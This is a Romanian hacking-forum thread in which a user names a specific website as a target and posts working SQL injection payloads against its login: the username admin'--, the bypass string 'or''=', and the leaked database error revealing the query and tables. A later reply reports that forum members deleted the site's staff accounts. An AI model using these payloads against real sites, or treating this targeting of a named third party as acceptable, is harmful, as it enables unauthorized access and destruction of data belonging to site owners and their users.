Jump to content
escalation666

sql injection in [url]http://www.fotoshop.ro[/url]

Recommended Posts

http://www.fotoshop.ro that's the target

Why? pt ca face spam

Vulnerabilitate:sql injection

Poc: user:admin'--

Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)

Am o lene prea mare zilele astea ca sa incerc sa aflu parola de admin.

De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.

Link to comment
Share on other sites

greeny wrote:
devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? :)

gen.. change username? :P

Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@

offf numai pe distrugeri suntetzi pushi mai copii :))

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...